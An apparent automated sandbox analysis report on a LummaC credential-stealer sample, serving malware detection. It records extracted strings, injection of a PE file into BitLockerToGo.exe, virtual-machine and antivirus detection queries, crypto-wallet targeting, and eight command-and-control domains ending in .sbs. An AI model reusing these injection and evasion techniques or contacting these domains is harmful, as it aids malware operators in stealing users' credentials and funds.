DB: first chunk link(file-014) corrupted DB: first chunk data34694469519536141888238489627838134765625A sampling of all past memory allocationsInuktitut (Syllabics) Canada (iu-Cans-CA)MapIter.Next called on exhausted iteratorNo decoder provided for content type '%s'Option ,inline needs a struct value fieldSELECT content FROM (%s) WHERE path == $1Time.UnmarshalBinary: unsupported versionUrdu Islamic Republic Of Pakistan (ur-PK)Used block at offset %#x: Nonzero paddingUyghur People's Republic Of China (ug-CN)` VirtualSize is extremely large > 256MiBasn1: internal error in parseTagAndLengthattempt to eliminate additional providersattempted to add zero-sized address rangebinary: varint overflows a 64-bit integerbytes.Buffer.WriteTo: invalid Write countbytes.Reader.WriteTo: invalid Write countcan't call pointe
Source: BitLockerToGo.exe, 00000002.00000003.1891638344.0000000004E04000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: gFCeeWNTvZ.exe

Virustotal: Detection: 11%

Source: gFCeeWNTvZ.exe	String found in binary or memory: ^[A-Z]{3}[ ]?\d{2,4}$^\+[1-9]?[0-9]{7,14}$^\d{4,5}\|\d{3}-\d{4}$after top-level valuearray_subscript_errorasync stack too largebad number syntax: %qbad type in compare: bigint AUTO_INCREMENTblock device requiredbufio: negative countcaching_sha2_passwordcannot marshal type: cardinality_violationcheckdead: runnable gconcurrent map writescorrupted h265 packetdavinci-instruct-betadebug-include/excludedecompression failuredefer on system stackdiagnostics_exceptiondoes not have outputsexec: already startedexpect object or nullexpected DOCUMENT-ENDexpected STREAM-STARTextended echo requestfdw_invalid_data_typefeature_not_supportedfield value not validfinal calculate flowsfindrunnable: wrong pflag %q begins with -flush buffered writerforeign_key_violationfound unknown field: frame_ping_has_streamglGetIntegerui64i_vNVglVertexAttribPointerglfwGetPrimaryMonitorgorm:update_interfacehttp: Handler timeouthttp: invalid patternimage: unknown formatin string escape codeincomplete field nameinvalid JPEG format: invalid NumericStringinvalid emitter stateinvalid named captureinvalid nesting depthinvalid scalar lengthita: method not foundjinzhu/gorm/.*test.gokey is not comparablelink has been severedlocalhost.localdomainmalformed profile: %vmethod is not allowedminimal-error-handlermode %v not supportedmysql_native_passwordnegative shift amountnot enough pixel datao1-preview-2024-09-12operator_interventionout of range of widthpackage not installedpanic on system stackpng: invalid format: pool has been stoppedpreempt at unknown pcprivilege_not_grantedprivilege_not_revokedread-only file systemreflect.Value.Complexreflect.Value.Pointerreflect.Value.SetUintreleasep: invalid argrequest_count_by_pathrtcp: too many chunksruntime: confused by runtime: mappedReady=runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: totalMapped=runtime: work.nwait= sequence tag mismatchserialization_failureset bit is not 0 or 1sql_routine_exceptionsrf_protocol_violatedstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestatement_too_complexstring_has_lower_casestring_has_upper_casestring_has_whitespacestring_is_credit_cardstring_is_dial_stringstring_is_hexadecimalstring_is_request_uristring_is_request_urlstring_is_utf_numericsuccessful_completiontag:yaml.org,2002:inttag:yaml.org,2002:maptag:yaml.org,2002:seqtag:yaml.org,2002:strtimer data corruptiontoo many coefficientstrace/breakpoint traptype %s not supportedtype is not cacheableundefined variable %qunexpected slice sizeunexpected value stepunexpected value typeunknown ABI part kindunknown empty Contextunknown field type %dunknown wire type: %dunmatched parenthesisunsupported extensionunsupported value: %funterminated_c_stringuser defined signal 1user defined signal 2utf8mb4_lithuanian_ciutf8mb4_vietnamese_ciwrite handler not setx509: invalid version into Go struct field #define ADDRESS_REPEAT#define ADDRESS_UNSAFE#define FILTER_NEAREST%SystemRoot%\system32\' is not a map to dive(Mutex::)?Un
Source: gFCeeWNTvZ.exe	String found in binary or memory: ^data:((?:\w+\/(?:([^;]\|;[^;]).)+)?)accessing a corrupted shared librarybytes.Reader.ReadAt: negative offsetbytes.Reader.Seek: negative positionchacha20: wrong HChaCha20 nonce sizecompare: need two params, but got %dcompressed name in SRV resource dataconverting NULL to %s is unsupportedcorrupted DB: table head data len %dcould not extract codec from rtcp-fbcrypto/cipher: input not full blockscrypto/rand: argument to Int is <= 0crypto/sha1: invalid hash state sizecrypto/sha512: invalid hash functiondate(%v, %v, %v, %v, %v, %v, %v, %v)deepObject=true not supported for %sdid not find expected <stream-start>did not find expected version numberdocument contains excessive aliasingedwards25519: invalid point encodingexpected [ character for array valueexpected an ECDSA public key, got %Tfail to read section relocations: %vfail to read string table length: %vfailure to read data directories: %vfunc TestRegression(t *testing.T) {
Source: gFCeeWNTvZ.exe	String found in binary or memory: \s([[:xdigit:]]+)-([[:xdigit:]]+):\s(\S+)(\s.*@)?([[:xdigit:]]+)?graphicscommand: IsInvalidated cannot be called on the screen imageinvalid DSN: network address not terminated (missing closing brace)opengl: creating framebuffer failed: gl.IsFramebuffer returns falsepacking: Extend cannot be called without rolling back or committingquery statement does not produce a result set (no top level SELECT)shareable: the image being shared is too big: width: %d, height: %d{{.Field}} must be a valid IP address (either IPv4 or Ipv6 address){{.Field}} must contain English letters and digits only (a-zA-Z0-9)2695994666715063979466701508701962594045780771442439172168272236806126959946667150639794667015087019630673557916260026308143510066298881FileAlignment lesser than 0x200 and different from section alignment^[ABCEGHJKLMNPRSTVXY]\d[ABCEGHJ-NPRSTV-Z][ ]?\d[ABCEGHJ-NPRSTV-Z]\d$big: invalid 2nd argument to Int.Jacobi: need odd integer but got %scrypto/hmac: hash generation function does not produce unique valuesdamaged Import Table information. ILT and/or IAT appear to be brokendecoding int array or slice: length exceeds input size (%d elements)embedded IPv4 address must replace the final 2 fields of the addressexpected SCALAR, SEQUENCE-START, MAPPING-START, or ALIAS, but got %vexpected logical or operator or one of [$end, ')', ',', ';', OR, \|\|]expected one of [$end, ')', ';', GROUP, LIMIT, OFFSET, ORDER, WHERE]expecting the prefix to be the "urn" string (whatever case) [col %d]go package net: built with netgo build tag; using Go's DNS resolver
Source: gFCeeWNTvZ.exe	String found in binary or memory: decoding complex128 array or slice: length exceeds input size (%d elements)invalid operation: %v << %v (shift count type %T, must be unsigned integer)pkcs7: cannot encrypt content: only DES-CBC, AES-CBC, and AES-GCM supportedthe optional header size is %d < 68, which is insufficient for authenticodetls: internal error: attempted to read record with pending application dataCondense cannot operate on collections whose last element is a wrap functionexpected UPDATE statement optional WHERE clause or one of [$end, ';', WHERE]optional header size(%d) is less minimum size (%d) for PE32+ optional headertls: failed to send closeNotify alert (but connection was closed anyway): %wtls: server certificate contains incorrect key type for selected ciphersuiteINSERT INTO %v (%v) SELECT %v %v WHERE NOT EXISTS (SELECT * FROM %v WHERE %v)MapIter.Next called on an iterator that does not have an associated map Value^([a-zA-Z0-9]{1}[a-zA-Z0-9-]{0,62}){1}(\.[a-zA-Z0-9]{1}[a-zA-Z0-9-]{0,62})*?$^[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}$crypto/tls: ExportKeyingMaterial is unavailable when renegotiation is enabledexpected CREATE INDEX optional UNIQUE clause or one of [INDEX, TABLE, UNIQUE]expected logical or operator or one of [$end, ')', ',', ';', DEFAULT, OR, \|\|]expected optional comma or one of [$end, ')', ',', ';', LIMIT, OFFSET, ORDER]header extension id must be between 1 and 14 for RFC 5285 one byte extensionsreceived a non-starting FU-A packet without any previous FU-A starting packet115792089210356248762697446949407573529996955224135760342422259061068512044369115792089210356248762697446949407573530086143415290314195533631308867097853951RVA AddressOfNames in the export directory points to an invalid address: 0x%x
Source: gFCeeWNTvZ.exe	String found in binary or memory: net/addrselect.go
Source: gFCeeWNTvZ.exe	String found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
Source: gFCeeWNTvZ.exe	String found in binary or memory: github.com/hajimehoshi/ebiten@v1.12.12/internal/glfw/load_windows.go

Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe

File read: C:\Users\user\Desktop\gFCeeWNTvZ.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\gFCeeWNTvZ.exe "C:\Users\user\Desktop\gFCeeWNTvZ.exe"
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"	Jump to behavior

Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Section loaded: dinput8.dll	Jump to behavior
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Section loaded: xinput1_4.dll	Jump to behavior
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Section loaded: hid.dll	Jump to behavior
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25E609E4-B259-11CF-BFC7-444553540000}\InProcServer32

Jump to behavior

Source: gFCeeWNTvZ.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: gFCeeWNTvZ.exe

Static file information: File size 48627712 > 1048576

Source: gFCeeWNTvZ.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x7fe600
Source: gFCeeWNTvZ.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x7a4e00

Source: gFCeeWNTvZ.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe

0_2_64608848

Source: gFCeeWNTvZ.exe	Static PE information: section name: .symtab
Source: glfw.3927611081.dll.0.dr	Static PE information: section name: /4
Source: glfw.3927611081.dll.0.dr	Static PE information: section name: /19
Source: glfw.3927611081.dll.0.dr	Static PE information: section name: /31
Source: glfw.3927611081.dll.0.dr	Static PE information: section name: /45
Source: glfw.3927611081.dll.0.dr	Static PE information: section name: /57
Source: glfw.3927611081.dll.0.dr	Static PE information: section name: /70
Source: glfw.3927611081.dll.0.dr	Static PE information: section name: /81
Source: glfw.3927611081.dll.0.dr	Static PE information: section name: /92

Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Code function: 0_3_12766666 push ecx; retf	0_3_127666C4
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Code function: 0_3_1276C03C push ds; retn 000Ah	0_3_1276C13A
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Code function: 0_3_1276A816 push esp; iretd	0_3_1276A81D
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Code function: 0_3_127648E6 push esp; iretd	0_3_127648ED
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Code function: 0_3_127600E0 push esp; iretd	0_3_127600E1
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Code function: 0_3_1276B9DE pushfd ; iretd	0_3_1276B9DD
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Code function: 0_3_1276B4B6 push edi; iretd	0_3_1276B4C5
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Code function: 0_3_1276B998 pushfd ; iretd	0_3_1276B9DD
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Code function: 0_3_1247B4AB pushad ; iretd	0_3_1247B561
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Code function: 0_2_64608848 push ecx; mov dword ptr [esp], 64631695h	0_2_64608A19
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Code function: 0_2_64608848 push esi; mov dword ptr [esp], 646316DBh	0_2_64608A75
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Code function: 0_2_64608848 push esi; mov dword ptr [esp], 6463170Eh	0_2_64608AB8
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Code function: 0_2_6460C519 push eax; mov dword ptr [esp], 00003839h	0_2_6460C7F6
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Code function: 0_2_646094CB push ecx; mov dword ptr [esp], eax	0_2_6460969D
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Code function: 0_2_646094CB push edx; mov dword ptr [esp], eax	0_2_6460974A
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Code function: 0_2_6460B169 push ebx; mov dword ptr [esp], esi	0_2_6460B1BB
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Code function: 0_2_6460B26A push ecx; mov dword ptr [esp], eax	0_2_6460B46F
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Code function: 0_2_6460BA29 push edx; mov dword ptr [esp], eax	0_2_6460BA62
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Code function: 0_2_6460DEEC push esi; mov dword ptr [esp], ebx	0_2_6460DF4E
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Code function: 0_2_6460B6B7 push eax; mov dword ptr [esp], 00003839h	0_2_6460B703
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Code function: 0_2_6460737C push esi; mov dword ptr [esp], ebx	0_2_6460755C
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Code function: 0_2_6460737C push ecx; mov dword ptr [esp], ebx	0_2_646076B0
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Code function: 0_2_6460AB26 push eax; mov dword ptr [esp], edi	0_2_6460AB76
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Code function: 0_2_6460AB26 push edx; mov dword ptr [esp], ebx	0_2_6460AB80
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Code function: 0_2_64601B16 push eax; mov dword ptr [esp], ebx	0_2_64601EB5
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Code function: 0_2_6460ABC8 push eax; mov dword ptr [esp], esi	0_2_6460AC76
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Code function: 0_2_64605394 push ecx; mov dword ptr [esp], eax	0_2_6460E36D

Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe

File created: C:\Users\user\AppData\Local\Temp\glfw.3927611081.dll

Jump to dropped file

Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe

Code function: 0_2_6460CD2B IsIconic,

0_2_6460CD2B

Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe

0_2_64608848

Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\glfw.3927611081.dll

Jump to dropped file

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 7856	Thread sleep time: -150000s >= -30000s			Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 7856	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: BitLockerToGo.exe, 00000002.00000002.1984876735.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: BitLockerToGo.exe, 00000002.00000002.1984876735.0000000000A8C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWhq
Source: gFCeeWNTvZ.exe, 00000000.00000002.1864614530.00000000008BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_00558160 LdrInitializeThunk,

2_2_00558160

Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe

0_2_64608848

Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Code function: 0_2_646105EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,		0_2_646105EC
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Code function: 0_2_646105F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,		0_2_646105F0

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe

Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 520000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe

Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 520000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: gFCeeWNTvZ.exe, 00000000.00000002.1875297422.00000000128A4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: tamedgeesy.sbs
Source: gFCeeWNTvZ.exe, 00000000.00000002.1875297422.00000000128A4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: relalingj.sbs
Source: gFCeeWNTvZ.exe, 00000000.00000002.1875297422.00000000128A4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: rottieud.sbs
Source: gFCeeWNTvZ.exe, 00000000.00000002.1875297422.00000000128A4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: brownieyuz.sbs
Source: gFCeeWNTvZ.exe, 00000000.00000002.1875297422.00000000128A4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: explainvees.sbs
Source: gFCeeWNTvZ.exe, 00000000.00000002.1875297422.00000000128A4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: ducksringjk.sbs
Source: gFCeeWNTvZ.exe, 00000000.00000002.1875297422.00000000128A4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: thinkyyokej.sbs
Source: gFCeeWNTvZ.exe, 00000000.00000002.1875297422.00000000128A4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: repostebhu.sbs

Writes to foreign memory regions

Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 721008	Jump to behavior
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 520000	Jump to behavior
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 521000	Jump to behavior
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 55D000	Jump to behavior
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 560000	Jump to behavior
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 571000	Jump to behavior
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 572000	Jump to behavior

Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe

Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

Jump to behavior

Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe

Code function: 0_2_64610530 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_64610530

Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe

Code function: 0_2_646031E0 glfwGetVersion,

0_2_646031E0

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: BitLockerToGo.exe, 00000002.00000002.1984876735.0000000000A9D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1984876735.0000000000AFB000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1949339957.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1949294335.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 7812, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected MicroClip

Source: Yara match

File source: Process Memory Space: gFCeeWNTvZ.exe PID: 7564, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: BitLockerToGo.exe, 00000002.00000003.1891269625.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
